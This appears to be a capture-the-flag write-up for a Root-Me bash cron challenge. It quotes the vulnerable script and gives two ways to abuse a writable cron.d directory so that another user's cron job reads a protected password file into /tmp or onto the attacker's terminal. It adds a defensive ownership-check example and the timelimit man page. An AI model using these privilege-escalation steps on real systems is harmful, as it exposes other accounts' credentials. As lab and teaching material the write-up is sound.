LINK:https://www.root-me.org/en/Challenges/App-Script/Bash-cron
After logging in to the host, view the contents of the ch4 shell script:
    app-script-ch4@challenge02:~$ cat ch4
    #!/bin/bash

    # Sortie de la commande 'crontab -l' exécutée en tant que app-script-ch4-cracked:
    # */1 * * * * /challenge/app-script/ch4/ch4
    # (Note: the crontab of user app-script-ch4-cracked runs the script
    #  /challenge/app-script/ch4/ch4 once every minute.)
    # Vous N'avez PAS à modifier la crontab(chattr +i t'façons)

    # Output of the command 'crontab -l' run as app-script-ch4-cracked:
    # */1 * * * * /challenge/app-script/ch4/ch4
    # You do NOT need to edit the crontab (it's chattr +i anyway)

    # hiding stdout/stderr
    exec 1>/dev/null 2>&1

    wdir="cron.d/"
    challdir=${0%/*}
    cd "$challdir"

    if [ ! -e "/tmp/._cron" ]; then
        mkdir -m 733 "/tmp/._cron"
    fi

    ls -1a "${wdir}" | while read task; do
        if [ -f "${wdir}${task}" -a -x "${wdir}${task}" ]; then
            # (Note: I don't fully understand the timelimit command, but roughly it
            #  runs bash -p cron.d/<some script> within a fixed time interval.)
            timelimit -q -s9 -S9 -t 5 bash -p "${PWD}/${wdir}${task}"
        fi
        rm -f "${PWD}/${wdir}${task}"
    done

    rm -rf cron.d/*

The final `rm -rf cron.d/*` cleans out the files in that directory every minute. Solving this challenge requires creating a script in that directory; it is possible that the script gets deleted before I have finished the related steps, so the solution has to be completed within one minute.
Solution 1: write the password to a file.
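    app-script-ch4@challenge02:~$ vi cron.d/1.sh
    #!/bin/bash
    if [ ! -e "/tmp/ch4" ]; then
        mkdir -m 777 "/tmp/ch4"
    fi
    /bin/cat /challenge/app-script/ch4/.passwd > /tmp/ch4/result.txt
    app-script-ch4@challenge02:~$ chmod o+rx cron.d/1.sh

The chmod makes the script readable and executable by other users, because it has to run from the scheduled task of the app-script-ch4-cracked user. The script may be deleted almost immediately after it is created, in which case it has to be created again. After these two steps, wait no more than one minute and /tmp/ch4/result.txt will be generated with the password in it.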
Solution 2: print the password on the terminal of the SSH session.
    app-script-ch4@challenge02:~$ set |grep "/dev/pts" |awk -F '=' '{print $2}'    # find the terminal used by the current ssh connection
    /dev/pts/20
    app-script-ch4@challenge02:~$ chmod o+w /dev/pts/20    # give other users, i.e. app-script-ch4-cracked, write permission on the current terminal
    app-script-ch4@challenge02:~$ vi cron.d/1.sh
    #!/bin/bash
    /bin/cat /challenge/app-script/ch4/.passwd > /dev/pts/20
    app-script-ch4@challenge02:~$ chmod o+rx cron.d/1.sh

In less than a minute the result is printed on the current terminal.
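Both solutions work because the cron job, running as app-script-ch4-cracked, executes every executable file it finds in cron.d/, a directory the challenge user can write to. The following is an added example (not part of the original writeup or of the challenge) of the ownership and mode checks a runner could make before executing a task; `is_safe_task`, `run_tasks` and the demo tree are hypothetical, and GNU coreutils `stat` is assumed.

```shell
#!/bin/bash
# Added example, not the challenge's code. Assumes GNU coreutils stat(1).
# is_safe_task and run_tasks are hypothetical helper names.

# is_safe_task FILE TRUSTED_UID
# Succeeds only if FILE is a regular file (not a symlink) and both FILE and its
# directory are owned by TRUSTED_UID with no group/other write bit. Because the
# directory itself must not be writable by others, nobody else can swap the
# file between this check and its execution.
is_safe_task() {
    local file=$1 uid=$2 p meta
    [ -f "$file" ] && [ ! -L "$file" ] || return 1
    for p in "$(dirname -- "$file")" "$file"; do
        meta=$(stat -c '%u %a' -- "$p") || return 1
        [ "${meta% *}" = "$uid" ] || return 1           # owner must be trusted
        [ $(( 0${meta#* } & 022 )) -eq 0 ] || return 1  # no g+w / o+w
    done
}

# run_tasks DIR TRUSTED_UID
# Reports which entries a hardened runner would execute and which it would skip.
run_tasks() {
    local dir=$1 uid=$2 task
    for task in "$dir"/*; do
        [ -e "$task" ] || [ -L "$task" ] || continue
        if [ -x "$task" ] && is_safe_task "$task" "$uid"; then
            echo "run  ${task##*/}"
        else
            echo "skip ${task##*/}"
        fi
    done
}

# Constructed demo tree: one properly owned task, one world-writable task.
demo() {
    local d
    d=$(mktemp -d) || return 1
    mkdir -m 755 "$d/cron.d"
    printf '#!/bin/sh\n' > "$d/cron.d/ok.sh";   chmod 755 "$d/cron.d/ok.sh"
    printf '#!/bin/sh\n' > "$d/cron.d/open.sh"; chmod 777 "$d/cron.d/open.sh"
    run_tasks "$d/cron.d" "$(id -u)"
    rm -rf "$d"
}
demo
```

A runner would pass its own uid as TRUSTED_UID, so a file dropped by any other account is skipped instead of executed.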
Appendix: timelimit man page
TIMELIMIT(1)              BSD General Commands Manual              TIMELIMIT(1)

NAME
     timelimit -- effectively limit the absolute execution time of a process

SYNOPSIS
     timelimit [-pq] [-S killsig] [-s warnsig] [-T killtime] [-t warntime]
               command [arguments ...]

DESCRIPTION
     The timelimit utility executes a given command with the supplied
     arguments and terminates the spawned process after a given time with a
     given signal. If the process exits before the time limit has elapsed,
     timelimit will silently exit, too.

     Options:

     -p      If the child process is terminated by a signal, timelimit
             propagates this condition, i.e. sends the same signal to itself.
             This allows the program executing timelimit to determine whether
             the child process was terminated by a signal or actually exited
             with an exit code larger than 128.

     -q      Quiet operation - timelimit does not output diagnostic messages
             about signals sent to the child process.

     -S killsig
             Specify the number of the signal to be sent to the process
             killtime seconds after warntime has expired. Defaults to 9
             (SIGKILL).

     -s warnsig
             Specify the number of the signal to be sent to the process
             warntime seconds after it has been started. Defaults to 15
             (SIGTERM).

     -T killtime
             Specify the maximum execution time of the process before sending
             killsig after warnsig has been sent. Defaults to 120 seconds.

     -t warntime
             Specify the maximum execution time of the process in seconds
             before sending warnsig. Defaults to 3600 seconds.

     On systems that support the setitimer(2) system call, the warntime and
     killtime values may be specified in fractional seconds with microsecond
     precision.

ENVIRONMENT
     KILLSIG   The killsig to use if the -S option was not specified.
     KILLTIME  The killtime to use if the -T option was not specified.
     WARNSIG   The warnsig to use if the -s option was not specified.
     WARNTIME  The warntime to use if the -t option was not specified.

EXIT STATUS
     If the child process exits normally, the timelimit utility will pass its
     exit code on up. If the child process is terminated by a signal and the
     -p flag was not specified, the timelimit utility's exit status is 128
     plus the signal number, similar to sh(1). If the -p flag was specified,
     the timelimit utility will raise the signal itself so that its own parent
     process may in turn reliably distinguish between a signal and a larger
     than 128 exit code.

     In rare cases, the timelimit utility may encounter a system or user
     error; then, its exit status is one of the standard sysexits(3) values:

     EX_USAGE     The command-line parameters and options were incorrectly
                  specified.
     EX_SOFTWARE  The timelimit utility itself received an unexpected signal
                  while waiting for the child process to terminate.
     EX_OSERR     The timelimit utility was unable to execute the child
                  process, wait for it to terminate, or examine its exit
                  status.

EXAMPLES
     The following examples are shown as given to the shell:

           timelimit -p /usr/local/bin/rsync rsync://some.host/dir /opt/mirror

     Run the rsync program to mirror a WWW or FTP site and kill it if it runs
     longer than 1 hour (that is 3600 seconds) with SIGTERM. If the rsync
     process does not exit after receiving the SIGTERM, timelimit issues a
     SIGKILL 120 seconds after the SIGTERM. If the rsync process is terminated
     by a signal, timelimit will itself raise this signal.

           tcpserver 0 8888 timelimit -t600 -T300 /opt/services/chat/stats

     Start a tcpserver(n) process listening on tcp port 8888; each client
     connection shall invoke an instance of an IRC statistics tool under
     /opt/services/chat and kill it after 600 seconds have elapsed. If the
     stats process is still running after the SIGTERM, it will be killed by a
     SIGKILL sent 300 seconds later.

           env WARNTIME=4.99 WARNSIG=1 KILLTIME=1.000001 timelimit sh stats.sh

     Start a shell script and kill it with a SIGHUP in a little under 5
     seconds. If the shell gets stuck and does not respond to the SIGHUP, kill
     it with the default SIGKILL just a bit over a second afterwards.

SEE ALSO
     kill(1), rsync(1), signal(3), tcpserver(n)

STANDARDS
     No standards documentation was harmed in the process of creating
     timelimit.

BUGS
     Please report any bugs in timelimit to the author.

AUTHOR
     The timelimit utility was conceived and written by Peter Pentchev
     <roam@ringlet.net> with contributions and suggestions by Karsten W
     Rohrbach <karsten@rohrbach.de>, Teddy Hogeborn <teddy@fukt.bsnet.se>,
     and Tomasz Nowak <nowak2000@poczta.onet.pl>.